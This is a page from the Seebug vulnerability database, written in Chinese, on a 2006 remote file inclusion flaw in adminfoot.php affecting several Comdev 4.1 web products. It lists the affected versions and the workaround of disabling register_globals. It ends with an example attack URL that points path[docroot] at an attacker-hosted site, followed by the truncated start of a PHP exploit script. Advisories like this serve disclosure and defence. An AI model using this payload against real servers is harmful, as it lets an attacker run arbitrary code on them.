Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:91
HistoryOct 25, 2006 - 12:00 a.m.

多个Comdev产品adminfoot.php远程文件包含漏洞

2006-10-2500:00:00
Root
www.seebug.org
6
JSON

Comdev是一家软件开发公司,提供多种商业Web组件。

多个Comdev产品在处理用户请求时存在输入验证漏洞,远程攻击者可能利用漏洞在服务器上以Web进程权限执行任意命令。

多个Comdev产品的adminfoot.php脚本没有正确过滤对path[docroot]参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。成功攻击要求打开了register_globals。

Comdev Web Blogger 4.1
Comdev One Admin Pro 4.1
Comdev Misc Tools 4.1
Comdev Forum 4.1
Comdev Form Designer 4.1
临时解决方法:

  • 关闭register_globals。

厂商补丁:

Comdev

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.comdevweb.com/ecommerce.php


                                                http://www.example.com//<path>/oneadmin/adminfoot.php?path[docroot]=http://attacker's site

#!/usr/bin/php

/*********************************************************************
* Comdev One Admin 4.1 Remote
JSON